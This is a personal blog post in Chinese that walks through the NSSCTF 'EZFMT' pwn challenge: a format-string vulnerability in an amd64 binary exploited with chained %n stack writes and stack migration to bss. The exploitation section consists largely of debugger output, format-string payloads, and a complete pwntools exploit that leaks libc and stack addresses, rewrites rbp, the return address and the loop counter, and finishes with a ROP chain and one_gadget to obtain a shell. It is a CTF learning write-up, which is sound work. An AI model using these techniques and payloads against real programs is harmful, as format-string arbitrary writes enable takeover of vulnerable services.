<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>NSSCTF EZFMT -- 格式化字符串栈溢出 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="NSSCTF EZFMT – 格式化字符串栈溢出这道题感觉是格式化字符串使用比较全面的例子，留个档记录下。 保护查看与静态分析12345Arch:     amd64-64-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x3ff000)    程序为amd64">
<meta property="og:type" content="article">
<meta property="og:title" content="NSSCTF EZFMT -- 格式化字符串栈溢出">
<meta property="og:url" content="http://example.com/2024/08/31/ezfmt/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="NSSCTF EZFMT – 格式化字符串栈溢出这道题感觉是格式化字符串使用比较全面的例子，留个档记录下。 保护查看与静态分析12345Arch:     amd64-64-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x3ff000)    程序为amd64">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-08-31T02:18:07.000Z">
<meta property="article:modified_time" content="2024-09-02T00:29:15.840Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-ezfmt" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/08/31/ezfmt/" class="article-date">
  <time class="dt-published" datetime="2024-08-31T02:18:07.000Z" itemprop="datePublished">2024-08-31</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      NSSCTF EZFMT -- 格式化字符串栈溢出
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="NSSCTF-EZFMT-–-格式化字符串栈溢出"><a href="#NSSCTF-EZFMT-–-格式化字符串栈溢出" class="headerlink" title="NSSCTF EZFMT – 格式化字符串栈溢出"></a>NSSCTF EZFMT – 格式化字符串栈溢出</h1><p>这道题感觉是格式化字符串使用比较全面的例子，留个档记录下。</p>
<h2 id="保护查看与静态分析"><a href="#保护查看与静态分析" class="headerlink" title="保护查看与静态分析"></a>保护查看与静态分析</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Arch:     amd64-64-little</span><br><span class="line">RELRO:    Partial RELRO</span><br><span class="line">Stack:    No canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      No PIE (0x3ff000)</span><br></pre></td></tr></table></figure>



<p>程序为<code>amd64</code>架构，开启了<code>NX</code>与<code>partial RELRO</code>。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> i; <span class="comment">// [rsp+Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  init_io(argc, argv, envp);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Welcome to 3rd&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;fmt challenge&quot;</span>);</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">6</span>; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;&gt;&quot;</span>);</span><br><span class="line">    read(<span class="number">0</span>, buf, <span class="number">0x100</span>uLL);</span><br><span class="line">    <span class="built_in">printf</span>(buf);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>IDA静态分析如上，发现main函数中存在格式化字符串漏洞，允许向<code>bss</code>段中写入<code>0x100</code>个字节，总计可以执行7次。</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p><code>printf</code>会从栈中取参数，但我们的输入却在<code>bss</code>上，因此我们不能直接向栈中写入地址，因此我们考虑栈迁移到<code>bss段</code>。如果我们想要栈迁移，不可避免的是修改<code>rbp</code>，如果我们可以往栈内输入，可以直接泄露栈地址向栈中输入<code>rbp</code>的地址，再利用<code>%n</code>实现修改<code>rbp</code>。但我们不能向栈内写时，该如何修改栈中的数据呢。</p>
<p>我们首先开始调试，将断点下在<code>printf</code>前，查看栈内状态。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; stack 0x30</span><br><span class="line">00:0000│ rsp 0x7fffffffdf68 —▸ 0x401247 (main+106) ◂— add dword ptr [rbp - 4], 1</span><br><span class="line">01:0008│-010 0x7fffffffdf70 —▸ 0x7fffffffe070 ◂— 1</span><br><span class="line">02:0010│-008 0x7fffffffdf78 ◂— 0</span><br><span class="line">03:0018│ rbp 0x7fffffffdf80 ◂— 0</span><br><span class="line">04:0020│+008 0x7fffffffdf88 —▸ 0x7ffff7df9083 (__libc_start_main+243) ◂— mov edi, eax</span><br><span class="line">05:0028│+010 0x7fffffffdf90 ◂— 0x50 /* <span class="string">&#x27;P&#x27;</span> */</span><br><span class="line">06:0030│+018 0x7fffffffdf98 —▸ 0x7fffffffe078 —▸ 0x7fffffffe3a7 ◂— <span class="string">&#x27;/home/dov3/quz/NSS/ezfmt/pwn&#x27;</span></span><br><span class="line">07:0038│+020 0x7fffffffdfa0 ◂— 0x1f7fbd7a0</span><br><span class="line">08:0040│+028 0x7fffffffdfa8 —▸ 0x4011dd (main) ◂— endbr64 </span><br><span class="line">09:0048│+030 0x7fffffffdfb0 —▸ 0x401260 (__libc_csu_init) ◂— endbr64 </span><br><span class="line">0a:0050│+038 0x7fffffffdfb8 ◂— 0x24f5fc9ff668308d</span><br><span class="line">0b:0058│+040 0x7fffffffdfc0 —▸ 0x4010b0 (_start) ◂— endbr64 </span><br><span class="line">0c:0060│+048 0x7fffffffdfc8 —▸ 0x7fffffffe070 ◂— 1</span><br><span class="line">0d:0068│+050 0x7fffffffdfd0 ◂— 0</span><br><span class="line">0e:0070│+058 0x7fffffffdfd8 ◂— 0</span><br><span class="line">0f:0078│+060 0x7fffffffdfe0 ◂— 0xdb0a03604948308d</span><br><span class="line">10:0080│+068 0x7fffffffdfe8 ◂— 0xdb0a1320d606308d</span><br><span class="line">11:0088│+070 0x7fffffffdff0 ◂— 0</span><br><span class="line">... ↓        2 skipped</span><br><span class="line">14:00a0│+088 0x7fffffffe008 ◂— 1</span><br><span class="line">15:00a8│+090 0x7fffffffe010 —▸ 0x7fffffffe078 —▸ 0x7fffffffe3a7 ◂— <span class="string">&#x27;/home/dov3/quz/NSS/ezfmt/pwn&#x27;</span></span><br><span class="line">16:00b0│+098 0x7fffffffe018 —▸ 0x7fffffffe088 —▸ 0x7fffffffe3c4 ◂— <span class="string">&#x27;SHELL=/bin/bash&#x27;</span></span><br><span class="line">17:00b8│+0a0 0x7fffffffe020 —▸ 0x7ffff7ffe190 ◂— 0</span><br><span class="line">18:00c0│+0a8 0x7fffffffe028 ◂— 0</span><br><span class="line">19:00c8│+0b0 0x7fffffffe030 ◂— 0</span><br><span class="line">1a:00d0│+0b8 0x7fffffffe038 —▸ 0x4010b0 (_start) ◂— endbr64 </span><br><span class="line">1b:00d8│+0c0 0x7fffffffe040 —▸ 0x7fffffffe070 ◂— 1</span><br><span class="line">1c:00e0│+0c8 0x7fffffffe048 ◂— 0</span><br><span class="line">1d:00e8│+0d0 0x7fffffffe050 ◂— 0</span><br><span class="line">1e:00f0│+0d8 0x7fffffffe058 —▸ 0x4010de (_start+46) ◂— hlt </span><br><span class="line">1f:00f8│+0e0 0x7fffffffe060 —▸ 0x7fffffffe068 ◂— 0x1c</span><br><span class="line">20:0100│+0e8 0x7fffffffe068 ◂— 0x1c</span><br><span class="line">21:0108│ r13 0x7fffffffe070 ◂— 1</span><br><span class="line">22:0110│+0f8 0x7fffffffe078 —▸ 0x7fffffffe3a7 ◂— <span class="string">&#x27;/home/dov3/quz/NSS/ezfmt/pwn&#x27;</span></span><br><span class="line">23:0118│+100 0x7fffffffe080 ◂— 0</span><br><span class="line">24:0120│+108 0x7fffffffe088 —▸ 0x7fffffffe3c4 ◂— <span class="string">&#x27;SHELL=/bin/bash&#x27;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>我们可以看到，<code>rbp + 0x18</code>的位置 存了<code>rbp + 0xf8</code>的地址，而这个地址内又存了另一个栈中的地址。利用这一结构，我们就能实现对栈内的数据进行写。</p>
<p>首先我们通过<code>%n</code>修改<code>rbp + 0x18</code>处的地址为我们想要修改的位置的地址，由于按页加载机制，我们只需要覆写低地址几位即可。这时<code>rbp + 0xf8</code>处就存了我们想要修改的地址。之后再次通过<code>%n</code>修改这一地址即可实现任意地址写，这道题我们则需要修改<code>rbp</code>与返回地址。</p>
<p>这样我们可以得到一组payload，每次利用需要用掉两次输入机会。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload1 = (<span class="string">&quot;%&#123;&#125;c%11$hn&quot;</span>.<span class="built_in">format</span>(target)).encode()</span><br><span class="line">payload2 = (<span class="string">&quot;%&#123;&#125;c%39$hn&quot;</span>.<span class="built_in">format</span>(content)).encode()</span><br><span class="line"><span class="comment">#其中hn仅作示例，可自由替换为n与hhn</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>考虑到我们修改一个地址可能需要利用多次，7次的限制可能会很紧俏。但好消息是我们发现已经循环次数也存在栈中，因此我们同样可以修改这一数值。我们只需要在次数不够用时把这个值缩小即可继续进行利用。</p>
<p>我们需要栈迁移的话，需要两次<code>leave;ret</code>，因此我们还需要修改返回地址。修改方法和上面相同。</p>
<p>整体的利用流程如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1，泄露栈地址以及libc地址</span><br><span class="line">2，修改rbp与返回地址</span><br><span class="line">3，写入ROP执行栈迁移得到shell</span><br></pre></td></tr></table></figure>

<h2 id="完整EXP"><a href="#完整EXP" class="headerlink" title="完整EXP"></a>完整EXP</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">s       = <span class="keyword">lambda</span> data               :io.send(data)</span><br><span class="line">sa      = <span class="keyword">lambda</span> delim,data         :io.sendafter(delim, data)</span><br><span class="line">sl      = <span class="keyword">lambda</span> data               :io.sendline(data)</span><br><span class="line">sla     = <span class="keyword">lambda</span> delim,data         :io.sendlineafter(delim, data)</span><br><span class="line">r       = <span class="keyword">lambda</span> num                :io.recv(num)</span><br><span class="line">rl      = <span class="keyword">lambda</span>                    :io.recvline()</span><br><span class="line">ru      = <span class="keyword">lambda</span> delims, drop=<span class="literal">True</span>  :io.recvuntil(delims, drop)</span><br><span class="line">itr     = <span class="keyword">lambda</span>                    :io.interactive()</span><br><span class="line">uu32    = <span class="keyword">lambda</span> data               :u32(data.ljust(<span class="number">4</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">uu64    = <span class="keyword">lambda</span> data               :u64(data.ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">ls      = <span class="keyword">lambda</span> data               :log.success(data)</span><br><span class="line">lss     = <span class="keyword">lambda</span> s                  :log.success(<span class="string">&#x27;\033[1;31;40m%s --&gt; 0x%x \033[0m&#x27;</span> % (s, <span class="built_in">eval</span>(s)))</span><br><span class="line"></span><br><span class="line">context.arch      = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">binary = <span class="string">&#x27;./pwn&#x27;</span></span><br><span class="line">libelf = <span class="string">&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (binary!=<span class="string">&#x27;&#x27;</span>): elf  = ELF(binary) ; rop=ROP(binary);libc = elf.libc</span><br><span class="line"><span class="keyword">if</span> (libelf!=<span class="string">&#x27;&#x27;</span>): libc = ELF(libelf)</span><br><span class="line"></span><br><span class="line">io = process(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#io = remote(&quot;node8.anna.nssctf.cn&quot;,23875)</span></span><br><span class="line"><span class="comment">#通过格式化字符串泄露libc与栈地址</span></span><br><span class="line">payload1 = <span class="string">b&quot;%39$lx.%3$lx.%11$lx&quot;</span> <span class="comment">#read + 18  | rbp + 0x118</span></span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line">sl(payload1)</span><br><span class="line">aim = <span class="built_in">int</span>(ru(<span class="string">b&quot;.&quot;</span>),<span class="number">16</span>)</span><br><span class="line">ls(<span class="built_in">hex</span>(aim))</span><br><span class="line">libc_read = <span class="built_in">int</span>(ru(<span class="string">b&quot;.&quot;</span>),<span class="number">16</span>)-<span class="number">18</span></span><br><span class="line">rbp = <span class="built_in">int</span>(ru(<span class="string">b&quot;\n&quot;</span>,),<span class="number">16</span>) - <span class="number">0x118</span> +<span class="number">0x20</span></span><br><span class="line">ls(<span class="built_in">hex</span>(libc_read))</span><br><span class="line">ls(<span class="built_in">hex</span>(rbp))</span><br><span class="line">libc = LibcSearcher(<span class="string">&quot;read&quot;</span>,libc_read)</span><br><span class="line">libc_base = libc_read - libc.dump(<span class="string">&quot;read&quot;</span>)</span><br><span class="line">one_gadget = libc_base + <span class="number">0xe3afe</span></span><br><span class="line">bin_sh = libc_base + libc.dump(<span class="string">&quot;str_bin_sh&quot;</span>)</span><br><span class="line">rdi_ret = <span class="number">0x4012c3</span></span><br><span class="line">r12_13_14_15 = <span class="number">0x4012bc</span></span><br><span class="line">ls(<span class="built_in">hex</span>(libc_base))</span><br><span class="line"><span class="comment">#修改rbp为bss上地址</span></span><br><span class="line">a = rbp &amp; <span class="number">0xffff</span></span><br><span class="line">ls(<span class="built_in">hex</span>(a))</span><br><span class="line">payload2 = (<span class="string">&quot;%&#123;&#125;c%11$hn&quot;</span>.<span class="built_in">format</span>(a)).encode()</span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line">sl(payload2)</span><br><span class="line">b = <span class="number">0x4088</span></span><br><span class="line">payload3 = (<span class="string">&quot;%&#123;&#125;c%39$hn&quot;</span>.<span class="built_in">format</span>(b)).encode()</span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line"><span class="comment">#gdb.attach(io)</span></span><br><span class="line">sl(payload3)</span><br><span class="line">c = a+<span class="number">2</span></span><br><span class="line">ls(<span class="built_in">hex</span>(c))</span><br><span class="line">payload4 = (<span class="string">&quot;%&#123;&#125;c%11$hn&quot;</span>.<span class="built_in">format</span>(c)).encode()</span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line">sl(payload4)</span><br><span class="line">b = <span class="number">0x40</span></span><br><span class="line">payload5 = (<span class="string">&quot;%&#123;&#125;c%39$hhn&quot;</span>.<span class="built_in">format</span>(b)).encode()</span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line">sl(payload5)</span><br><span class="line"><span class="comment">#修改次数判断的部分，增加利用次数</span></span><br><span class="line">d = a-<span class="number">4</span></span><br><span class="line">ls(<span class="built_in">hex</span>(d))</span><br><span class="line">payload6 = (<span class="string">&quot;%&#123;&#125;c%11$hn&quot;</span>.<span class="built_in">format</span>(d)).encode()</span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line">sl(payload6)</span><br><span class="line">payload5 = (<span class="string">&quot;%39$hhn&quot;</span>).encode()</span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line">sl(payload5)</span><br><span class="line"><span class="comment">#修改返回地址为leave;ret,这里修改了末4字节</span></span><br><span class="line">d = a+<span class="number">8</span></span><br><span class="line">ls(<span class="built_in">hex</span>(d))</span><br><span class="line">payload6 = (<span class="string">&quot;%&#123;&#125;c%11$hn&quot;</span>.<span class="built_in">format</span>(d)).encode()</span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line">sl(payload6)</span><br><span class="line">b = <span class="number">0x1256</span></span><br><span class="line">payload5 = (<span class="string">&quot;%&#123;&#125;c%39$hn&quot;</span>.<span class="built_in">format</span>(b)).encode()</span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line">sl(payload5)</span><br><span class="line">d = a+<span class="number">10</span></span><br><span class="line">ls(<span class="built_in">hex</span>(d))</span><br><span class="line">payload6 = (<span class="string">&quot;%&#123;&#125;c%11$hn&quot;</span>.<span class="built_in">format</span>(d)).encode()</span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line">sl(payload6)</span><br><span class="line">b = <span class="number">0x40</span></span><br><span class="line">payload5 = (<span class="string">&quot;%&#123;&#125;c%39$hn&quot;</span>.<span class="built_in">format</span>(b)).encode()</span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line">sl(payload5)</span><br><span class="line"><span class="comment">#修改次数判断的部分，增加利用次数</span></span><br><span class="line">d = a-<span class="number">4</span></span><br><span class="line">ls(<span class="built_in">hex</span>(d))</span><br><span class="line">payload6 = (<span class="string">&quot;%&#123;&#125;c%11$hn&quot;</span>.<span class="built_in">format</span>(d)).encode()</span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line">sl(payload6)</span><br><span class="line">b = <span class="number">0x3</span></span><br><span class="line">payload5 = (<span class="string">&quot;%&#123;&#125;c%39$hhn&quot;</span>.<span class="built_in">format</span>(b)).encode()</span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line">sl(payload5)</span><br><span class="line"><span class="comment">#继续修改返回地址，这里修改首4字节</span></span><br><span class="line">d = a+<span class="number">12</span></span><br><span class="line">ls(<span class="built_in">hex</span>(d))</span><br><span class="line">payload6 = (<span class="string">&quot;%&#123;&#125;c%11$hn&quot;</span>.<span class="built_in">format</span>(d)).encode()</span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line">sl(payload6)</span><br><span class="line">payload5 = (<span class="string">&quot;%39$n&quot;</span>).encode()</span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line">sl(payload5)</span><br><span class="line"><span class="comment">#写入ROP栈迁移到bss执行onegadget</span></span><br><span class="line">payload6 = p64(rbp)+p64(rbp)+p64(rdi_ret)+p64(bin_sh)+p64(r12_13_14_15)+ p64(<span class="number">0</span>)*<span class="number">4</span> +p64(one_gadget)</span><br><span class="line">ru(<span class="string">b&quot;&gt;\n&quot;</span>)</span><br><span class="line"><span class="comment">#gdb.attach(io)</span></span><br><span class="line">sl(payload6)</span><br><span class="line">itr()</span><br></pre></td></tr></table></figure>

<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>一开始尝试使用system拿到shell，但尝试后发现system会向<code>rsp-0x300</code>左右的一个位置写，这里没有权限导致无法执行。最后换成了one_gadget才得以执行</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/08/31/ezfmt/" data-id="cm0k8ntgm0000okwr7xpuamvi" data-title="NSSCTF EZFMT -- 格式化字符串栈溢出" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/09/01/stdout_libc/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          stdout_libc
        
      </div>
    </a>
  
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/09/">September 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/08/">August 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/09/02/hello-world/">Hello World</a>
          </li>
        
          <li>
            <a href="/2024/09/01/stdout_libc/">stdout_libc</a>
          </li>
        
          <li>
            <a href="/2024/08/31/ezfmt/">NSSCTF EZFMT -- 格式化字符串栈溢出</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>